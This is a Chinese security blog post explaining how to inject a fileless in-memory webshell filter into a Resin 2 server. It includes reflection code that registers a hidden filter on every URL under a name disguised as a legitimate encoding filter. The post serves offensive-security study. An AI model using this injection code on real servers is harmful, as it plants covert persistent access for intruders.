Java安全之Resin2内存马

环境

resin2.1.17

添加Filter分析

依然是web.xml注册一个filter,debug进去看注册流程

debug dofilter逻辑时看到如下代码,最终走入this._filterChain = this._application.buildFilterChain(this, this._config);去build filterchain。并且貌似是初始化的时候才会去buildfilterchain,当后面第二次再走时,这里的_filterchain已经是有值的了。

this._application应为上下文对象,继续往下跟通过QFilterConfig#createFilter来创建了一个Filter,之后new 了一个FilterChain

注意下面三个对象,添加上即可

_filterMap

首先看FilterMap构造,主要是Regexp,QFilterConfig后面再说

可以反射实例化之后调用方法或者set属性来设置值

class FilterMap {

    static L10N L;

    private String servletName;

    private Regexp regexp;

    private Object data;

    FilterMap() {

    }

    void setServletName(String servletName) {

        this.servletName = servletName;

    }

    void setRegexp(String regexpPattern, String flags) throws Exception {

        this.regexp = new Regexp(regexpPattern, flags);

    }

    void setURLPattern(String urlPattern, String flags) throws ServletException {

        this.regexp = this.urlPatternToRegexp(urlPattern, flags);

    }

下面看Regexp ,其实就是一个正则来控制的路由处理

^.*$

^(?=/)|^$

调用有参构造即可

_filters

hashtable对象,key为filtername,value为QFilterConfig对象,key可以随便伪造成个正常的

_filterList

直接add一个QFilterConfig元素即可

看到QConfigFilter,Registry为空就走if的逻辑,传入构造好的属性即可

package com.caucho.server.http;

import com.caucho.util.BeanUtil;

import com.caucho.util.CauchoSystem;

import com.caucho.util.L10N;

import com.caucho.util.RegistryNode;

import java.util.Collections;

import java.util.Enumeration;

import java.util.HashMap;

import java.util.Iterator;

import javax.servlet.Filter;

import javax.servlet.FilterConfig;

import javax.servlet.ServletContext;

import javax.servlet.ServletException;

class QFilterConfig implements FilterConfig {

    static L10N L;

    private static HashMap _configElements;

    private Application _application;

    private RegistryNode _registry;

    private RegistryNode _initRegistry;

    private String _name;

    private String _className;

    private HashMap _init;

    private Filter _filter;

    QFilterConfig(Application application, String name, String defaultClassName, RegistryNode registry) throws ServletException {

        this._application = application;

        this._registry = registry;

        this._name = name;

        this._init = new HashMap();

        if (registry == null) {

            if (defaultClassName == null) {

                this._className = name;

            } else {

                this._className = defaultClassName;

            }

        } else {

            this._className = registry.getString("filter-class", defaultClassName);

            Iterator iter = registry.iterator();

            while(iter.hasNext()) {

                RegistryNode node = (RegistryNode)iter.next();

                if (node.getName().equals("init-param")) {

                    try {

                        application.fillParam(node, this._init);

                    } catch (ServletException var8) {

                        throw var8;

                    } catch (Exception var9) {

                        throw new ServletException(var9);

                    }

                } else if (node.getName().equals("init")) {

                    this._initRegistry = node;

                } else if (_configElements.get(node.getName()) == null) {

                    throw Application.error(node, L.l("unknown element `{0}' in {1}", node.getName(), registry.getName()));

                }

            }

        }

    }

后面就是用c0ny1师傅的java-object-searcher工具挖掘Application和Request在当前线程上下文的位置即可。

//设置搜索类型包含ServletRequest,RequstGroup,Request...等关键字的对象

List<Keyword> keys = new ArrayList();

keys.add(new Keyword.Builder().setField_type("Request").build());

keys.add(new Keyword.Builder().setField_type("Application").build());

//新建一个广度优先搜索Thread.currentThread()的搜索器

SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(),keys);

//打开调试模式

searcher.setIs_debug(true);

//挖掘深度为20

searcher.setMax_search_depth(20);

//设置报告保存位置

searcher.setReport_save_path("/tmp/");

searcher.searchObject();

result

# Request

TargetObject = {java.lang.Thread}

  ---> target = {com.caucho.server.TcpConnection}

   ---> request = {com.caucho.server.http.HttpRequest}

# Application

TargetObject = {java.lang.Thread}

  ---> contextClassLoader = {com.caucho.java.CompilingClassLoader}

       ---> attributes = {java.util.Hashtable}

         ---> attributes = {com.caucho.server.http.Application}

后面直接添加即可

主要代码

    private static void doInject(){

        filterName = "CharacterEncodingFilter-" + System.nanoTime();

        try {

            if (APPLICATION !=null){

                // Regexp

//                Class RegexpClazz = getClazz("com.caucho.regexp.Regexp");

//                Constructor RegexpConstructor = RegexpClazz.getDeclaredConstructor(String.class);

//                Object regexpObj = RegexpConstructor.newInstance("^(?=/)|^$");

                // QFilterConfig

                Class QFilterConfigclazz = getClazz("com.caucho.server.http.QFilterConfig");

                Constructor QFilterConfigConstructor = QFilterConfigclazz.getDeclaredConstructor(getClazz("com.caucho.server.http.Application"), String.class, String.class, getClazz("com.caucho.util.RegistryNode"));

                QFilterConfigConstructor.setAccessible(true);

                Object QFilterConfigObj = QFilterConfigConstructor.newInstance(APPLICATION, filterName, "HiganbanaFilter", null);

                // FilterMap

                Class filterMapClazz = getClazz("com.caucho.server.http.FilterMap");

                Constructor filterMapConstructor = filterMapClazz.getDeclaredConstructor();

                filterMapConstructor.setAccessible(true);

                Object filterMap = filterMapConstructor.newInstance();

                // set FilterMap regexp

                Method setRegexpMethod = filterMap.getClass().getDeclaredMethod("setURLPattern", String.class, String.class);

                setRegexpMethod.setAccessible(true);

                setRegexpMethod.invoke(filterMap,"/*", null);

                // set FilterMap data

                Method setDataMethod = filterMap.getClass().getDeclaredMethod("setData", Object.class);

                setDataMethod.setAccessible(true);

                setDataMethod.invoke(filterMap,QFilterConfigObj);

                // add FilterMap 2 _filterMap

                ArrayList _filterMap = (ArrayList) getFV(APPLICATION, "_filterMap");

                _filterMap.add(filterMap);

                // add QFilterConfig 2 _filterList

                ArrayList _filterList = (ArrayList) getFV(APPLICATION, "_filterList");

                _filterList.add(QFilterConfigObj);

                // put QFilterConfig 2 _filters

                Hashtable _filters = (Hashtable) getFV(APPLICATION, "_filters");

                _filters.put(filterName, QFilterConfigObj);

            }

        } catch (Exception e) {

        }

    }

    private static void getApplication(){

        Thread thread = Thread.currentThread();

        ClassLoader contextClassLoader = thread.getContextClassLoader();

        Hashtable attributesObj1 = (Hashtable) getFV(contextClassLoader,"attributes");

        APPLICATION = attributesObj1.get("caucho.application");

    }

但是有个弊端,debug逻辑的时候发现,只有在当前web.xml中已经存在有filter才能添加进去。暂未解决该问题。

最后

项目遇到的感觉比较有趣且极端的问题,虽然也不是很好的解决方案。

Java安全之Resin2内存马的更多相关文章

  1. Java安全之Weblogic内存马

    Java安全之Weblogic内存马 0x00 前言 发现网上大部分大部分weblogic工具都是基于RMI绑定实例回显,但这种方式有个弊端,在Weblogic JNDI树里面能将打入的RMI后门查看 ...

  2. Java安全之Spring内存马

    Java安全之Spring内存马 基础知识 Bean bean 是 Spring 框架的一个核心概念,它是构成应用程序的主干,并且是由 Spring IoC 容器负责实例化.配置.组装和管理的对象. ...

  3. Java安全之反序列化回显与内存马

    Java安全之反序列化回显与内存马 0x00 前言 按照我个人的理解来说其实只要能拿到Request 和 Response对象即可进行回显的构造,当然这也是众多方式的一种.也是目前用的较多的方式.比如 ...

  4. Java安全之基于Tomcat实现内存马

    Java安全之基于Tomcat实现内存马 0x00 前言 在近年来红队行动中,基本上除了非必要情况,一般会选择打入内存马,然后再去连接.而落地Jsp文件也任意被设备给检测到,从而得到攻击路径,删除we ...

  5. 简单学习java内存马

    看了雷石的内存马深入浅出,就心血来潮看了看,由于本人java贼菜就不介绍原理了,本文有关知识都贴链接吧 前置知识 本次主要看的是tomcat的内存马,所以前置知识有下列 1.tomcat结构,tomc ...

  6. 6. 站在巨人的肩膀学习Java Filter型内存马

    本文站在巨人的肩膀学习Java Filter型内存马,文章里面的链接以及图片引用于下面文章,参考文章: <Tomcat 内存马学习(一):Filter型> <tomcat无文件内存w ...

  7. 议题解析与复现--《Java内存攻击技术漫谈》(二)无文件落地Agent型内存马

    无文件落地Agent型内存马植入 可行性分析 使用jsp写入或者代码执行漏洞,如反序列化等,不需要上传agent Java 动态调试技术原理及实践 - 美团技术团队 (meituan.com) 首先, ...

  8. Java安全之基于Tomcat的Filter型内存马

    Java安全之基于Tomcat的Filter型内存马 写在前面 现在来说,内存马已经是一种很常见的攻击手法了,基本红队项目中对于入口点都是选择打入内存马.而对于内存马的支持也是五花八门,甚至各大公司都 ...

  9. Java安全之Tomcat6 Filter内存马

    Java安全之Tomcat6 Filter内存马 回顾Tomcat8打法 先回顾下之前Tomcat789的打法 这里先抛开 7 8之间的区别, 在8中,最后add到filterchain的都是一个fi ...

随机推荐

  1. 网站制作工具之EditPlus的使用

    这里分享网站制作教程所使用到的软件,我个人开发使用的是EditPlus和Dreamweaver这两款软件.在百度搜索一下这两个软件,安装好后就可以使用了. EditPlus的使用方法 EditPlus ...

  2. C++ 性能小测 1 二维数组的遍历效率

    C++ 性能小测 1 二维数组的遍历效率 遍历二维数组时,常规思路是使用一个嵌套循环.一方面,由于 CPU 使用了分支预测技术,因此通常将循环次数最多循环的放在最内层.另一方面,由于二维数组是按行存储 ...

  3. 【原创】K8S环境下研发如何本地调试?kt-connect使用详解

    K8S环境下研发如何本地调试?kt-connect使用详解 背景 注:背景有点啰嗦,讲讲一路走来研发本地调试的变化,嫌烦的可以直接跳过,不影响阅读. 2019年 我在的公司当时是个什么情况,只有两个J ...

  4. 多版本并发控制 MVCC

    介绍多版本并发控制 多版本并发控制技术(Multiversion Concurrency Control,MVCC) 技术是为了解决问题而生的,通过 MVCC 我们可以解决以下几个问题: 读写之间阻塞 ...

  5. Exchange备份和日志清除

    最近新部署Exchange 2019,虽然变化不大,但是也遇到了一些小问题.随着深入研究,就能发现一些以前被忽视的点.Exchange完成备份后,数据库日志并没有被清除,依然存在.https://ww ...

  6. opencv cv.line

    ''' 本次来学习基于opencv进行各种画图操作,以前只习惯用matplotlib,最近开始用opencv,觉得也很好用. cv.line(), cv.circle() , cv.rectangle ...

  7. PAT (Basic Level) Practice 1003 我要通过!分数 20

    "答案正确"是自动判题系统给出的最令人欢喜的回复.本题属于 PAT 的"答案正确"大派送 -- 只要读入的字符串满足下列条件,系统就输出"答案正确&q ...

  8. Jupyter Notebook单元格加宽的方法3种

    Jupyter Notebook的代码单元格比较窄,在我的屏幕上只占了一半都不到,网络搜索下,共找到3种加宽的方法,总结一下. (一)只改变当前Jupyter笔记本的单元格宽度 在Jupyter No ...

  9. Java连接MySQL数据库。编写一个应用程序,在主类Test_4类中,通过JDBC访问stu数据库,显示t_student表中的内容(表结构见表1),显示效果自己设计。

    题目2:编写一个应用程序,在主类Test_4类中,通过JDBC访问stu数据库,显示t_student表中的内容(表结构见表1),显示效果自己设计.之后,可根据显示的内容进行某条记录的删除(以id为条 ...

  10. 关于aws账单数据中几个重要的与费用相关的字段的意义分析

    今天在看aws账号的详细信息时,看到字段很多,大多数字段,根据名称可以知道代表的意义 对于如下几个字段的概念有点模糊(位于"UsageStartDate","UsageE ...